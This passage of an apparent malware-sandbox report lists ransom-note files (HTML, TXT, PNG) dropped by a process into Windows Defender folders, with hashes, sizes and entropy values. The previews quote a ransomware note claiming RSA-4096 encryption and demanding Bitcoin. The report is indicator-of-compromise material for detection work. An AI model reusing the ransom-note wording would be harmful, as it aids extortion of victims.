                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\Quarantine\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows Defender\Quarantine\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\CacheManager\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\CacheManager\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\CacheManager\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\ReportLatency\Latency\19\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\ReportLatency\Latency\19\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\ReportLatency\Latency\19\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\ReportLatency\Latency\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\ReportLatency\Latency\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\ReportLatency\Latency\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\ReportLatency\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\ReportLatency\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\ReportLatency\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
